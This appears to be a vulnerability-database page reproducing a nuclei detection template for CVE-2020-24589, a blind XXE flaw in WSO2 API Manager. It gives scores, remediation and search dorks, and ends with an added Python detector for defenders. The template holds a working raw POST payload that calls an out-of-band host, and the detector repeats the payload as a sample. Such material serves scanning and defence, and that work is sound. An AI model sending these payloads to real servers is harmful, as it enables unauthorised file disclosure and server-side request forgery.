nuclei / ProjectDiscovery / NUCLEI:CVE-2020-24589
History: Oct 16, 2021 - 12:37 a.m.

WSO2 API Manager <=3.1.0 - Blind XML External Entity Injection

2021-10-16 00:37:03
ProjectDiscovery
github.com

CVSS2: 6.4 Medium (AV:N/AC:L/Au:N/C:P/I:N/A:P)
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: NONE
Availability Impact: PARTIAL

CVSS3: 9.1 High (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H)
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: NONE
Availability Impact: HIGH

AI Score: 9.3 High (Confidence: High)

EPSS: 0.648 Medium (Percentile: 97.9%)

WSO2 API Manager 3.1.0 and earlier is vulnerable to blind XML external entity (XXE) injection. XXE often allows an attacker to view files on the server file system and to interact with any backend or external systems that the application itself can access, which allows the attacker to transmit sensitive data from the compromised server to a system that the attacker controls.

id: CVE-2020-24589

info:
  name: WSO2 API Manager <=3.1.0 - Blind XML External Entity Injection
  author: lethargynavigator
  severity: critical
  description: WSO2 API Manager 3.1.0 and earlier is vulnerable to blind XML external entity injection (XXE). XXE often allows an attacker to view files on the server file system, and to interact with any backend or external systems that the application itself can access which allows the attacker to transmit sensitive data from the compromised server to a system that the attacker controls.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, denial of service, or server-side request forgery.
  remediation: |
    Upgrade to a patched version of WSO2 API Manager (3.1.1 or above) or apply the provided security patch.
  reference:
    - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0742
    - https://nvd.nist.gov/vuln/detail/CVE-2020-24589
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/athiththan11/WSO2-CVE-Extractor
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 9.1
    cve-id: CVE-2020-24589
    cwe-id: CWE-611
    epss-score: 0.64778
    epss-percentile: 0.97891
    cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: wso2
    product: api_manager
    shodan-query: http.favicon.hash:1398055326
    fofa-query: icon_hash=1398055326
    google-query: inurl:"carbon/admin/login"
  tags: cve2020,cve,wso2,xxe,oast,blind

http:
  - raw:
      - |
        POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        payload=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+a+[+<!ENTITY+%25+xxe+SYSTEM+"http%3a//{{interactsh-url}}">%25xxe%3b]>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: body
        words:
          - "Failed to install the generic artifact type"
# digest: 4a0a00473045022100a46002c04b61e32de82a96a52b9b729882e74fa21aaaea3fc4c33bac965f7897022010b04d7670233afd72f3ee1137579adc1b40f09a0b771f769deba4e19d5069e1:922c64590222798bb761d5b6d8e72950
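
For defenders reviewing captured requests or writing a proxy/WAF rule, the request shape the template sends can be recognised as follows. This is an added example, not part of the ProjectDiscovery template or WSO2 code; the function names, reason labels and sample bodies are constructed for illustration, and the bounded re-decoding step is an assumption to catch nested percent-encoding.

```python
import re
from urllib.parse import parse_qs, unquote

# Endpoint and parameter name come from the template above.
ENDPOINT = "/carbon/generic/save_artifact_ajaxprocessor.jsp"
PARAM = "payload"

# DOCTYPE that opens an internal subset, and an entity (general or
# parameter) bound to an external identifier.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b[^>\[]*\[", re.I)
EXT_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?:%\s+)?[\w.:-]+\s+(?:SYSTEM|PUBLIC)\s+[\"']", re.I)

# Constructed sample bodies; the host is a placeholder.
SAMPLE_XXE_BODY = ('payload=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+a+[+<!ENTITY+%25+xxe'
                   '+SYSTEM+"http%3a//collector.example.invalid">%25xxe%3b]>')
SAMPLE_BENIGN_BODY = "payload=%3Cartifact%3E%3Cname%3Edemo%3C%2Fname%3E%3C%2Fartifact%3E"

def _fully_decode(value, rounds=3):
    """Undo nested percent-encoding (bounded) so double-encoded input is seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def flag_request(method, path, body):
    """Return the reasons a captured request matches the XXE request shape."""
    if method.upper() != "POST" or path.split("?", 1)[0] != ENDPOINT:
        return []
    reasons = []
    # parse_qs performs the first form-decoding pass (%25 -> %, + -> space).
    for value in parse_qs(body, keep_blank_values=True).get(PARAM, []):
        text = _fully_decode(value)
        if DOCTYPE_RE.search(text):
            reasons.append("doctype-internal-subset")
        if EXT_ENTITY_RE.search(text):
            reasons.append("external-entity-declaration")
    return reasons

if __name__ == "__main__":
    for body in (SAMPLE_XXE_BODY, SAMPLE_BENIGN_BODY):
        print(flag_request("POST", ENDPOINT, body))
```

A hit on this endpoint is worth correlating with outbound HTTP connections from the API Manager host, since the injection is blind and the response body alone shows only the "Failed to install the generic artifact type" error.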